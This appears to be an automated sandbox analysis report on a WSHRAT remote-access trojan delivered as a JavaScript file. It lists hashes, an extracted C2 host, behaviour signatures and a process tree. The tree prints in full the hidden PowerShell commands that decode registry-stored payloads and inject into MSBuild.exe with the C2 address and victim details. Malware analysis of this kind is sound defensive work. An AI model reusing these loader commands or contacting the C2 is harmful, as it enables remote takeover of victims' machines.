Overview

overview

10

Static

static

1

cc10da7e2a...4fc.js

windows7-x64

10

cc10da7e2a...4fc.js

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-05-2024 02:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js

  • Size

    616KB

  • MD5

    70a617fd2bdb08c64a65ecfba1612140

  • SHA1

    d41eec4cb2f449b845d3f4fa3baf80086705bba6

  • SHA256

    cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc

  • SHA512

    52c22c0b1d8b8e1b69224e4164fb75d0b07b7b1f8fb6b9b843218f0c01cae0279fe45cecbb538b021ddb7e57c723917ae2f34186881db210c8b4953b7a2b0961

  • SSDEEP

    12288:NYeIrWr/qRigAyX/kngXFbjTLvaH28nZH19Iimg0VtxWvTbxzOObcizI/mofdEMa:NYeIrWr/qRigAyX/kngXFbjTLvaH28nZ

Score
10/10
wshratexecutionpersistencetrojan

Malware Config

Extracted

Family

wshrat

C2

http://masterokrwh.duckdns.org:8426

Signatures

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

    trojanwshrat
  • Blocklisted process makes network request 34 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 30 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4920
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'masterokrwh.duckdns.org 8426 \"WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom\" 1'));"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5004
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        path masterokrwh.duckdns.org 8426 "WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom" 1
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:1380

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    f5e999203425db689dabef353914fdc4

    SHA1

    d2ee16b9e7ce74e6e5b77975d3821772db691089

    SHA256

    ee225f2a19470828215b5a9f8e76bc32c8dd8b11c8a8fa9d2bc5c89e9ec2299a

    SHA512

    c44a365fd26b253e1a34c1f7ab24c603d3d0c5ef3095c1aa912621bda938527b80f1a78a18b06be9ef0d161db36092f699da4cc066f0e9c72aa9839af4c9eba1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    c59b79254eac4e1713b7cb6db2f8f716

    SHA1

    c2bb1fe5310693fc444317f6f29bd95b01f3436b

    SHA256

    1f90f0288b54f56bc5a1ebfb0a931228d3f97b19f1ff9a3168098682ec840c63

    SHA512

    ec1e83e4fe9d21771964a5264e65217576faddce6726eebe209c2d721a042b6d9e02935c35111a1891c9e627357c34c0f63bbf7b09497627a12e124171d2590d

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    91a39b91c2b22ff00c12e56878baa09b

    SHA1

    e19e669a9c2c8fec9fb699c4c76384a105471bda

    SHA256

    931a2eaa61178581995773a9da78f4bfd76ad27c29b44442fa1329b384a0cd96

    SHA512

    59df651f9cab1c7b960e22d8207766cef07393b33d42f2b759bf4043cd63f2abaf08f9e1b419c6a126fb51a98468d15d34ba09caac46dfbc1a1b658c513aa2b0

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5r2i5tgn.ebx.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
    Filesize

    616KB

    MD5

    70a617fd2bdb08c64a65ecfba1612140

    SHA1

    d41eec4cb2f449b845d3f4fa3baf80086705bba6

    SHA256

    cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc

    SHA512

    52c22c0b1d8b8e1b69224e4164fb75d0b07b7b1f8fb6b9b843218f0c01cae0279fe45cecbb538b021ddb7e57c723917ae2f34186881db210c8b4953b7a2b0961

    Download Submit

  • memory/1380-54-0x0000000005770000-0x0000000005802000-memory.dmp

    Filesize

    584KB

    Download

  • memory/1380-51-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/1380-53-0x0000000005C80000-0x0000000006224000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1380-55-0x0000000005810000-0x00000000058AC000-memory.dmp

    Filesize

    624KB

    Download

  • memory/1380-58-0x00000000056E0000-0x00000000056EA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4920-27-0x00007FFA20DE0000-0x00007FFA218A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4920-24-0x00007FFA20DE0000-0x00007FFA218A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4920-23-0x00007FFA20DE0000-0x00007FFA218A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4920-12-0x00007FFA20DE3000-0x00007FFA20DE5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4920-22-0x000002B07F400000-0x000002B07F422000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5004-50-0x0000017DF4CA0000-0x0000017DF4CAA000-memory.dmp

    Filesize

    40KB

    Download